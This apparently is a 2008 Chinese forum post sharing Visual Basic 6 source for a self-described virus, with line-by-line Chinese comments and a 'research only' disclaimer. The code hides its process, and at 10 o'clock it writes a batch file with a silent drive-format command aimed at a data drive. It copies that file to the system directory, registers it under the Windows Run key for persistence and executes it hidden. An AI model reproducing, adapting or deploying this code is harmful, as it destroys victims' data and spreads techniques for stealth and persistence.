|
|
此代码仅供研究,请勿乱用
[SCC]
SCC=This is a source code control file
[VB病毒.vbp]
SCC_Project_Name=this project is not under source code control
SCC_Aux_Path=<This is an empty string for the mssccprj.scc file>
Attribute VB_Name = \"Module1\"
Sub Main() '启动时必须要有Sub Main()或着是一个窗体,病毒当然不需要窗体
App.TaskVisible = False '让病毒不显示进程,增加隐蔽性
On Error Resume Next '出现错误忽略并继续运行
Dim nowtime, nowtime2
nowtime = Time$ '获取当前时间
nowtime2 = Left$(nowtime, 2) '截取前两位数字
If nowtime2 = \"10\" Then GoTo A: '条件判断,如果前两位数字为10就转到A
If nowtime2 <> \"10\" Then GoTo B: '如果不等于10就转到B
A:
Dim aa$, jj%, DesLocation
aa = StrReverse(Environ(\"ComSpec\"))
jj = InStr(aa, \"\\\")
winsys = StrReverse((Trim(Mid(aa, jj + 1, Len(aa) - jj))))
DesLocation = winsys & \"\\WinComputerclosed.bat\" '获取系统目录
Dim systempath
systempath = winsys
Select Case systempath '进入字符串筛选
Case \"C:\\windows\\system32\" '当系统目录在C盘的时候
Open App.Path & \"\\WinComputerclosed.bat\" For Output As #1
'在病毒所在目录下创建一个叫WinComputerclosed的批处理文件
Print #1, \"format d /q /autotest /u\"
'打开刚生成的批处理文件,将格式化D盘命令写入其中
Close #1 '关闭批处理文件
Case \"D:\\windows\\system32\" '当系统目录在D盘的时候
Open App.Path & \"\\WinComputerclosed.bat\" For Output As #1
'在病毒所在目录下创建一个叫WinComputerclosed的批处理文件
Print #1, \"format e /q /autotest /u\"
'打开刚生成的批处理文件,将格式化E盘命令写入其中
Close #1 '关闭批处理文件
Case \"E:\\windows\\system32\" '当系统目录在E盘的时候
Open App.Path & \"\\WinComputerclosed.bat\" For Output As #1
'在病毒所在目录下创建一个叫WinComputerclosed的批处理文件
Print #1, \"format f /q /autotest /u\"
'打开刚生成的批处理文件,将格式化F盘命令写入其中
Close #1 '关闭批处理文件
Case \"F:\\windows\\system32\" '当系统目录在F盘的时候
Open App.Path & \"\\WinComputerclosed.bat\" For Output As #1
'在病毒所在目录下创建一个叫WinComputerclosed的批处理文件
Print #1, \"format c /q /autotest /u\"
'打开刚生成的批处理文件,将格式化C盘命令写入其中
Close #1 '关闭批处理文件
End Select '结束筛选
Dim Location '定义一个变量,用来储存病毒原体所在路径
Location = App.Path & \"\\WinComputerclosed.bat\"
FileCopy Location, DesLocation '文件复制,将病毒原体复制到系统目录下
Dim Reg
Set Reg = CreateObject(\"wscript.Shell\") '创建有个wscript.shell对象
Reg.RegWrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\WinComputerclosed\", \"C:\\WINDOWS\\SYSTEM\\WinComputerclosed.bat\"
'将病毒写入注册表,随电脑开启而启动
Shell App.Path & \"\\WinComputerclosed.bat\", vbHide '隐藏运行病毒原体,关闭电脑。
B:
End
End Sub |
|
发表于 2008-1-25 06:17:42
